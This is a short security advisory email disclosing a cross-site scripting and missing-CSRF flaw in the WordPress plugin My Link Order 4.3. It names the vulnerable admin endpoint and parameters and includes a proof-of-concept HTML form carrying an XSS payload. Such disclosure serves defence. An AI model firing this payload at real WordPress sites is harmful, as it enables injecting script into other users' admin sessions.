Subject: Cross-Site Scripting (XSS) in My Link Order 4.3

Date: Thu, 13 Aug 2015 18:38:25 +0200

Hello,

Plugin: My Link Order 4.3 https://wordpress.org/plugins/my-link-order/

1. Cross-Site Scripting (XSS)

Authenticated users (like editors) can inject html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/link-manager.php?page=mylinkorder

Vulnerable parameters: cats, hdnCatID

Example PHP callstack:

mylinkorder [/my-link-order/mylinkorder.php:160]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/link-manager.php?page=mylinkorder">

<input type="text" name="btnCats" value="1" />

<input type="text" name="cats" value='"><img src=x onerror=alert(1) />' />

<input type="submit" />

</form>

--

--

Regards,
Marcin Probola,